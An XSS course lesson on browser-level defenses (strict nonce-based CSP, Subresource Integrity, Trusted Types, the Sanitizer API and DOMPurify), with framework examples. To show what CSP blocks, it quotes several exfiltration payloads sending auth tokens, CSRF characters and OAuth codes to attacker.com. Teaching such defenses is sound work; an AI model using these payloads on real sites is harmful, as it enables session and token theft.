CSP, Trusted Types, and the Sanitizer API
Lessons 1 through 5 covered how XSS works, where it shows up in frameworks, how it escalates through OAuth, and how AI is introducing new vectors.
All of those lessons focused on preventing XSS at the code level: encoding output, sanitizing input, using textContent instead of innerHTML, and building the SafeHTML wrapper.
This lesson covers a different layer.
The browser itself has features that block XSS attacks even when our code has vulnerabilities.
A strict Content Security Policy prevents injected scripts from executing. Trusted Types prevents unsanitized strings from reaching dangerous DOM APIs. The Sanitizer API provides a native alternative to DOMPurify.
And Subresource Integrity prevents tampered CDN scripts from loading.
Here's what we'll cover:
- Content Security Policy: strict CSP with nonces, what it blocks, how to deploy it, and what breaks when we do
- Subresource Integrity for CDN-loaded scripts
- Trusted Types: enforcing sanitization at the browser level
- The Sanitizer API and setHTML() as a native innerHTML replacement
- DOMPurify configuration, framework integration, and limitations
- A prioritized action list for teams implementing these defenses
Content Security Policy
CSP is an HTTP response header that specifies which resources (scripts, styles, images, and connections) are allowed to load and execute on the page.
If a resource doesn't match the policy, the browser blocks it.
This is the single most impactful defense-in-depth measure against XSS, because it works even when an attacker successfully injects a payload into our HTML.
Why allowlist CSPs fail
The first generation of CSP policies used domain allowlists: script-src 'self' https://cdn.example.com https://www.google-analytics.com.
The problem, as Google's security team demonstrated in their 2016 paper "CSP Is Dead, Long Live CSP," is that allowlists are almost always bypassable.
If any domain on the allowlist hosts a JSONP endpoint or an Angular library with a template injection, the attacker can use it to execute arbitrary code.
Google found that 94.72% of real-world CSP policies could be bypassed this way.
The recommended approach is a strict CSP based on nonces.
Strict CSP with nonces
A nonce is a random value generated by the server for each HTTP response.
The server includes it in both the CSP header and the nonce attribute of every legitimate <script> tag.
When the browser receives the page, it checks each script: if the script's nonce matches the one in the header, it executes.
If it doesn't (because an attacker injected it and didn't know the nonce), the browser blocks it.
Here's what this looks like in Express:
Then in the HTML template:
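Assuming the nonce is exposed to the template (EJS-style interpolation shown; the variable name is illustrative), every legitimate script tag carries it:

```html
<!-- cspNonce is whatever variable the server exposes; an injected
     script has no way to guess this per-request value. -->
<script nonce="<%= cspNonce %>" src="/js/app.js"></script>
<script nonce="<%= cspNonce %>">
  initApp();
</script>
```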
If an attacker injects <script>alert(1)</script> via stored XSS, the browser refuses to execute it because the injected script doesn't have the correct nonce attribute.
strict-dynamic is an important addition.
It tells the browser: "Any script that was loaded by a nonced script is also trusted." This means our application's bundled JavaScript can dynamically load additional scripts (via createElement('script')) without each one needing its own nonce.
Without strict-dynamic, dynamically loaded scripts would be blocked, which breaks most modern JavaScript applications.
What CSP blocks in practice
Let's take the stored XSS attack from Lesson 2, where an attacker sets their display name to Cool Guy<img src=x onerror="fetch('https://attacker.com/log?t='+localStorage.getItem('auth_token'))">.
Without CSP, the browser renders the <img> tag, the image fails to load, and the onerror handler executes the JavaScript.
With a strict CSP, the browser still renders the <img> tag (images are allowed), but the inline onerror handler is blocked because inline event handlers are not permitted.
The browser logs an error to the console:
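The exact wording varies by browser; Chrome's message looks roughly like this:

```
Refused to execute inline event handler because it violates the following
Content Security Policy directive: "script-src 'nonce-...' 'strict-dynamic'".
Either the 'unsafe-inline' keyword, a hash, or a nonce is required to enable
inline execution.
```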
The attacker's payload is in the DOM, but it can't execute.
That's the value of CSP: it turns a successful XSS injection into a failed exploitation.
Blocking CSS exfiltration and network requests
In Lesson 2, we covered CSS-based data exfiltration where an attacker uses input[value^="a"] { background: url(https://attacker.com/log?char=a) } to leak CSRF tokens character by character. CSP blocks this by controlling the style-src directive.
If inline styles are not allowed (no 'unsafe-inline' in style-src), the injected <style> block won't apply.
Using nonces for styles, just like scripts, ensures only our own stylesheets apply.
The connect-src 'self' directive limits where fetch() and XMLHttpRequest can send data.
In Lesson 4, we showed the attacker using fetch('https://attacker.com/steal?code=' + code) to exfiltrate OAuth authorization codes.
With connect-src 'self', that fetch request is blocked because attacker.com is not in the allowed list.
The browser logs the violation, and the data stays in the browser.
frame-ancestors 'none' prevents our page from being embedded in an iframe on another site.
This replaces the older X-Frame-Options header and blocks clickjacking attacks.
It also prevents the iframe-based reflected XSS trigger from Lesson 2, where an attacker embedded our vulnerable search page in a hidden iframe on their site.
Deploying CSP without breaking the app
Every developer who has deployed CSP has broken something.
Inline event handlers like onclick="handleClick()" stop working.
Google Analytics scripts get blocked. Third-party chat widgets disappear.
This is expected. CSP is restrictive by design.
The deployment workflow uses report-only mode.
Instead of Content-Security-Policy, we set Content-Security-Policy-Report-Only with the same directives plus a report-to endpoint.
The browser evaluates the policy but doesn't enforce it.
Instead, it sends violation reports as JSON to our endpoint. We collect these for a few days, identify legitimate scripts that our policy would block, and adjust the policy before switching to enforcement mode.
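As a sketch, the header pair looks like this (the endpoint URL is a placeholder, and the nonce is generated per request):

```
Reporting-Endpoints: csp-reports="https://example.com/csp-reports"
Content-Security-Policy-Report-Only: script-src 'nonce-{random}' 'strict-dynamic'; object-src 'none'; base-uri 'none'; report-to csp-reports
```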
Common issues and fixes when deploying strict CSP:
- Inline event handlers (onclick, onsubmit, etc.) need to be replaced with addEventListener() calls in script files. This is the most common refactoring task and affects older codebases the most.
- Third-party scripts (analytics, chat widgets, ads) that load from external domains work with strict-dynamic if they're loaded by our nonced scripts. If they inject their own inline scripts, those will be blocked. Some vendors provide CSP-compatible versions of their scripts.
- The browser's developer console shows exactly which directive blocked which resource, which makes debugging practical. Every violation includes the directive name, the blocked resource URL, and the line number.
CSP in single-page applications
SPAs add complexity because the HTML is often rendered client-side.
If we're using a framework's static export (like next export or a static Vue/Vite build), there's no server to generate nonces per request.
In that case, we have two options.
The first is to use hash-based CSP instead of nonces. We calculate the hash of each inline script at build time and include it in the CSP header.
This works for static sites, but means any change to a script requires updating the CSP header.
The second is to serve the HTML through a server (or edge function) that generates nonces dynamically.
Next.js supports this through middleware that generates a nonce per request:
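A sketch of that middleware, following the pattern in the Next.js CSP guide (the file name and the x-nonce header name are conventions, not requirements):

```javascript
// middleware.js
import { NextResponse } from 'next/server';

export function middleware(request) {
  // Per-request nonce using the Web Crypto API available in the edge runtime.
  const nonce = btoa(
    String.fromCharCode(...crypto.getRandomValues(new Uint8Array(16)))
  );
  const csp = `script-src 'nonce-${nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'`;

  // Forward the nonce to server components via a request header...
  const requestHeaders = new Headers(request.headers);
  requestHeaders.set('x-nonce', nonce);

  // ...and attach the enforcing header to the response.
  const response = NextResponse.next({ request: { headers: requestHeaders } });
  response.headers.set('Content-Security-Policy', csp);
  return response;
}
```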
The nonce is then available in server components and layouts via headers().
Nuxt includes the nuxt-security module, which handles this automatically.
Angular's SSR can inject nonces during server rendering through its CSP_NONCE token.
If we're setting CSP via an HTML <meta> tag (because we don't control the server), there are limitations.
Meta tags can't set frame-ancestors, report-to, or sandbox directives. They also can't use report-uri for violation reporting, which means we lose the ability to monitor what the policy is blocking.
For full CSP protection, the HTTP header is strongly preferred.
Monitoring CSP violations in production
The report-to directive sends violation reports to an endpoint we control. This is essential for two reasons: catching legitimate breakage we missed during testing, and detecting actual XSS attempts that CSP is blocking.
Each violation report is a JSON payload containing the blocked URI, the directive that blocked it, the document URI, and the line number.
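A Reporting-API-style report body looks roughly like this (field names differ slightly between the older report-uri format and the newer report-to format):

```json
{
  "type": "csp-violation",
  "url": "https://example.com/profile",
  "body": {
    "documentURL": "https://example.com/profile",
    "effectiveDirective": "connect-src",
    "blockedURL": "https://attacker.com/log",
    "lineNumber": 12,
    "disposition": "enforce"
  }
}
```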
In production, these reports create a feedback loop: we see what's being blocked, determine if it's a legitimate resource we need to allowlist or an actual attack, and adjust the policy accordingly.
Services like report-uri.com and Sentry can aggregate these reports into dashboards.
Subresource Integrity
SRI lets us verify that a script or stylesheet loaded from a CDN hasn't been tampered with.
We add an integrity attribute to the <script> or <link> tag containing a hash of the expected file contents:
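For example (the hash value here is a truncated placeholder; crossorigin is required for SRI checks on cross-origin resources):

```html
<script
  src="https://cdn.example.com/library.min.js"
  integrity="sha384-..."
  crossorigin="anonymous"></script>
```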
If the file on the CDN is modified (by an attacker who compromised the CDN or a maintainer who was social-engineered), the hash won't match, and the browser will refuse to execute it.
We covered SRI in Lesson 3 alongside the Polyfill.io incident.
The important limitation: SRI only works for files that are identical across all requests.
Polyfill.io generated separate bundles for each browser, so the hash changed each time, preventing SRI from being applied.
For dynamic CDN content, self-hosting is the only safe option.
To generate SRI hashes, use openssl or the ssri npm package:
Or use srihash.org, which generates the full integrity attribute from a URL.
Trusted Types
Trusted Types addresses a specific problem: DOM XSS happens because APIs like innerHTML, document.write(), and eval() accept plain strings.
Any string can contain a script. Trusted Types changes this by making those APIs reject plain strings and accept only special typed objects created through a developer-defined policy.
The list of APIs that Trusted Types locks down covers the sinks we've been tracing throughout this module: Element.innerHTML, Element.outerHTML, Document.write(), DOMParser.parseFromString(), setTimeout(), and setInterval() when called with strings, eval(), new Function(), and Element.setAttribute() for certain attributes like src on script elements.
These are the same sinks from Lesson 2's source-and-sink analysis and the framework grep commands from Lesson 3.
Trusted Types puts a gate in front of all of them.
The enforcement is activated through a CSP directive:
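The directive, optionally combined with a trusted-types directive that restricts which policy names may be created (the policy name here is an example):

```
Content-Security-Policy: require-trusted-types-for 'script'; trusted-types dompurify
```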
With this header set, passing a string to innerHTML throws a TypeError:
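For example (the error text shown is Chrome's; other browsers word it differently):

```javascript
el.innerHTML = '<img src=x onerror=alert(1)>';
// Uncaught TypeError: Failed to set the 'innerHTML' property on 'Element':
// This document requires 'TrustedHTML' assignment.
```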
To make it work, we create a policy that sanitizes the input and returns a TrustedHTML object:
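A sketch of that policy (the name 'dompurify' is our choice, and must match any trusted-types directive set in the header):

```javascript
import DOMPurify from 'dompurify';

// createHTML runs on every string routed through this policy.
const policy = trustedTypes.createPolicy('dompurify', {
  createHTML: (input) =>
    DOMPurify.sanitize(input, { RETURN_TRUSTED_TYPE: true }),
});

// The assignment succeeds because a TrustedHTML object reaches the sink.
el.innerHTML = policy.createHTML(untrustedInput);
```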
The RETURN_TRUSTED_TYPE: true option tells DOMPurify to return a TrustedHTML object instead of a string. This is the bridge between DOMPurify (which sanitizes) and Trusted Types (which enforces that sanitization happened).
The value of Trusted Types is that it turns forgetting to sanitize into a runtime error instead of a silent vulnerability.
Every call to innerHTML without going through a policy throws an exception. During development, this surfaces every unsanitized sink in the codebase. In production, it blocks the attack even if a code path was missed.
For deployment, the same report-only strategy that works for CSP also applies to Trusted Types. Start with Content-Security-Policy-Report-Only: require-trusted-types-for 'script' to identify all the places in the codebase where strings are being passed to sinks.
The violation reports will list the exact file, line, and API call. Fix them one at a time (by routing through the policy), then switch to enforcement.
On large codebases, Google's own experience rolling out Trusted Types internally showed that most violations cluster in a small number of utility functions and third-party library integrations.
Fixing those covers the majority of the codebase.
Trusted Types has been supported in Chrome since version 83 (May 2020) and in all Chromium-based browsers (including Edge and Opera).
Firefox shipped support in version 148 (February 2026), and Safari added it in version 26.1.
This means Trusted Types now works across all major browsers for the first time.
Angular has built-in Trusted Types support.
Setting the CSP header trusted-types angular angular#unsafe-bypass; require-trusted-types-for 'script' enables enforcement for Angular applications.
Angular's DomSanitizer (which we covered in Lesson 3) already integrates with the Trusted Types API when it's available.
The Sanitizer API and setHTML()
Trusted Types enforces that strings undergo a policy check before reaching sinks.
The Sanitizer API provides a browser-native way to do the actual sanitization. They complement each other: Trusted Types is the enforcement layer, the Sanitizer API is the sanitization layer.
To understand why the Sanitizer API exists, consider what happens when we use DOMPurify with innerHTML:
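The two-parse flow:

```javascript
// Parse #1: DOMPurify parses the string into a DOM tree, strips
// dangerous nodes, and serializes the tree back to a string.
const clean = DOMPurify.sanitize(untrustedHtml);

// Parse #2: the browser parses that string all over again on insertion.
container.innerHTML = clean;
```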
The HTML is parsed twice: once by DOMPurify and once by the browser. This is where mutation XSS can sneak in (as we covered in Lesson 2): if DOMPurify's parser and the browser's parser disagree about how to interpret the same HTML, the sanitized output can produce a different DOM tree than expected.
It also has a performance cost for large HTML strings.
The Sanitizer API eliminates this by combining parsing and sanitization into a single step:
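The single-step equivalent:

```javascript
// Parse once, sanitize during the parse, insert directly —
// no intermediate serialized string for the parsers to disagree about.
container.setHTML(untrustedHtml);
```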
The browser's own parser handles both sanitization and insertion, which means mutation XSS through parser disagreement is eliminated by design.
With no configuration, setHTML() strips <script> tags, inline event handlers (onclick, onerror), javascript: URIs, and other elements known to be XSS vectors. It also strips <iframe>, <embed>, <object>, and <use> elements.
The default is safe for most use cases.
If we need to allow specific elements, we pass a custom Sanitizer:
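For example, allowing a small formatting subset (the configuration shape follows the current spec draft, which has shifted between drafts):

```javascript
container.setHTML(untrustedHtml, {
  sanitizer: { elements: ['p', 'b', 'i', 'a', 'ul', 'ol', 'li'] },
});
```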
An important guarantee: even if the custom Sanitizer explicitly allows <script> or onclick, setHTML() still removes them. The method always strips XSS-unsafe elements and attributes, regardless of the configuration.
The Sanitizer configuration controls what else gets through, but it can't weaken the XSS baseline.
This is a significant difference from DOMPurify, where a misconfigured ALLOWED_TAGS list that includes script would actually allow scripts through.
setHTML() is also context-aware.
If we call it on a <table> element, it will drop any child elements that aren't valid inside a table (like <div>). This is something DOMPurify can't do because it sanitizes strings without knowing where they'll be inserted.
Firefox 148 (February 2026) shipped setHTML() as a stable API. Chrome has experimental support behind a flag. Safari has the spec on its roadmap but hasn't shipped stable support yet. Until setHTML() has full cross-browser support, DOMPurify remains the production choice.
But setHTML() is where this is heading: browser-native sanitization that doesn't require a library, doesn't have supply chain risk, and parses HTML once instead of twice.
DOMPurify configuration
Until setHTML() is supported by all browsers, DOMPurify is the tool we use today.
We've been using it since Lesson 1, and we built the SafeHTML wrapper in Lesson 3.
Here's the deeper configuration we promised.
Default behavior
With zero configuration, DOMPurify.sanitize(input) strips <script> tags, event handler attributes (onerror, onclick, etc.), javascript: URIs, and other known XSS vectors.
It allows a wide range of HTML elements (paragraphs, headings, lists, links, images, tables) and their standard attributes.
For most use cases, the defaults are safe.
Restrictive configurations
When rendering user-generated content, we should allow only the elements we need.
For a comment system that supports bold and italic:
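A sketch of such a configuration:

```javascript
const clean = DOMPurify.sanitize(commentHtml, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br'],
  ALLOWED_ATTR: [], // no attributes at all — no href, no class, no style
});
```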
For AI-generated output (the Lesson 5 scenario where markdown image tags can exfiltrate data), strip images entirely:
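One way to do that (the exact tag list is a suggestion, not a fixed recipe):

```javascript
const clean = DOMPurify.sanitize(aiGeneratedHtml, {
  FORBID_TAGS: ['img', 'svg', 'picture'], // block image-based exfiltration
  FORBID_ATTR: ['style'],                 // and CSS-based leaks via inline styles
});
```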
Trusted Types integration
When Trusted Types enforcement is active, DOMPurify can return a TrustedHTML object instead of a string:
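In its simplest form:

```javascript
const trusted = DOMPurify.sanitize(dirty, { RETURN_TRUSTED_TYPE: true });
// `trusted` is a TrustedHTML object, so the assignment passes enforcement:
el.innerHTML = trusted;
```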
This is how DOMPurify and Trusted Types connect.
DOMPurify sanitizes, wraps the result in a TrustedHTML type, and the browser's Trusted Types enforcement accepts it as safe for DOM insertion.
Framework integration patterns
In React, the SafeHTML wrapper from Lesson 3 centralizes DOMPurify usage:
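A reconstruction of that wrapper (the Lesson 3 version may differ in details):

```javascript
import DOMPurify from 'dompurify';

// The one place dangerouslySetInnerHTML is allowed to appear.
function SafeHTML({ html, allowedTags }) {
  const clean = DOMPurify.sanitize(
    html,
    allowedTags ? { ALLOWED_TAGS: allowedTags } : {}
  );
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
```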
In Vue, a computed property handles sanitization reactively:
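A sketch as a single-file component:

```vue
<script setup>
import { computed } from 'vue';
import DOMPurify from 'dompurify';

const props = defineProps({ html: String });

// Re-sanitizes automatically whenever props.html changes.
const cleanHtml = computed(() => DOMPurify.sanitize(props.html));
</script>

<template>
  <div v-html="cleanHtml"></div>
</template>
```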
In Angular, the built-in DomSanitizer handles most cases, but for situations where we need DOMPurify's configuration options, a custom pipe works:
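A sketch of such a pipe (the pipe name is an arbitrary choice):

```typescript
import { Pipe, PipeTransform } from '@angular/core';
import { DomSanitizer, SafeHtml } from '@angular/platform-browser';
import DOMPurify from 'dompurify';

@Pipe({ name: 'purify' })
export class PurifyPipe implements PipeTransform {
  constructor(private sanitizer: DomSanitizer) {}

  transform(value: string): SafeHtml {
    // DOMPurify does the stripping; bypassSecurityTrustHtml tells Angular
    // not to re-sanitize the already-clean result.
    return this.sanitizer.bypassSecurityTrustHtml(DOMPurify.sanitize(value));
  }
}
```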
Limitations
DOMPurify is a JavaScript library, not a browser feature.
This means it's part of our supply chain.
In early 2026, CVE-2026-0540 was disclosed: a bypass in DOMPurify's handling of XML noscript elements that could lead to XSS.
The fix was released in versions 2.5.9 and 3.3.2. This is the nature of library-based security: when a bypass is found, every application using the vulnerable version is affected until they update.
DOMPurify also parses HTML twice.
First, DOMPurify.sanitize() parses the string into a DOM tree, traverses it, strips dangerous elements, and serializes it back to a string.
Then, when we assign that string to innerHTML, the browser parses it again.
This double-parsing has a performance cost (negligible for small inputs, measurable for large ones) and is the reason the Sanitizer API exists: setHTML() parses once, sanitizes during the parse, and inserts directly.
When setHTML() is available across browsers, it's the better option for new code. DOMPurify stays for legacy browser support and for cases where we need the sanitized string (not DOM insertion).
What to do right now
These defenses are listed in order of impact. Each one addresses specific attacks from earlier lessons.
Start with a strict CSP header using nonces. This is the single highest-impact change. It blocks inline script execution (Lesson 1's blog comment attack), inline event handlers (Lesson 2's <img onerror> payloads), and network exfiltration to attacker-controlled domains (Lesson 4's OAuth code theft via fetch()).
Deploy in report-only mode first, fix legitimate breakage, then enforce.
Move session tokens to HttpOnly cookies if they aren't already.
This blocks the simplest token theft vector from Lesson 4 (reading localStorage.getItem('access_token')). CSP's connect-src adds a second layer of protection by preventing exfiltration even if the token is accessible.
Use DOMPurify for any HTML rendering from untrusted sources.
This covers user-generated content (Lesson 2), framework escape hatches like dangerouslySetInnerHTML and v-html (Lesson 3), and AI-generated output (Lesson 5). Use restrictive ALLOWED_TAGS configurations.
For AI output, strip <img> tags to prevent markdown image exfiltration.
Add Trusted Types enforcement.
Set require-trusted-types-for 'script' in the CSP header and create a policy that uses DOMPurify with RETURN_TRUSTED_TYPE: true.
This turns forgotten sanitization into runtime errors instead of silent vulnerabilities. With cross-browser support reaching all major browsers in February 2026, Trusted Types is now deployable for production applications.
When setHTML() has stable support in Chrome and Safari, migrate new code from DOMPurify to the native API. Keep DOMPurify as a fallback for older browsers and for cases where the sanitized string is needed without DOM insertion.
What's next
We now have the full picture: how XSS attacks work (Lessons 1-2), where they live in our frameworks (Lesson 3), how they escalate (Lesson 4), where AI introduces them (Lesson 5), and how to defend against them at the browser level (this lesson).
In Lesson 7, we'll tie it all together with a practical audit checklist: a systematic process for finding and fixing XSS vulnerabilities in an existing application.
References
- MDN, "Content Security Policy (CSP)" https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
- MDN, "Content Security Policy implementation" https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/CSP
- Google, "Mitigate cross-site scripting (XSS) with a strict Content Security Policy" https://web.dev/articles/strict-csp
- Google, "Strict CSP" https://csp.withgoogle.com/docs/strict-csp.html
- OWASP, "Content Security Policy Cheat Sheet" https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
- MDN, "require-trusted-types-for CSP directive" https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Content-Security-Policy/require-trusted-types-for
- MDN, "HTML Sanitizer API" https://developer.mozilla.org/en-US/docs/Web/API/HTML_Sanitizer_API
- MDN, "Element.setHTML()" https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML
- Frederik Braun (Mozilla), "Why the Sanitizer API is just setHTML()" https://frederikbraun.de/why-sethtml.html
- Ollie Williams, "setHTML(), Trusted Types and the Sanitizer API" https://olliewilliams.xyz/blog/sanitizer/
- W3C / Google, "Trusted Types FAQ" https://github.com/w3c/trusted-types/wiki/FAQ
- The Register, "Mozilla decides Trusted Types is a worthy security feature" (December 2023) https://theregister.com/AMP/2023/12/21/mozilla_decides_trusted_types_is
- Firefox 148 release notes (Sanitizer API and Trusted Types shipped, February 2026) https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/148
- DOMPurify by Cure53 https://github.com/cure53/DOMPurify
- sanitizer-api.dev (interactive Sanitizer API demo) https://sanitizer-api.dev/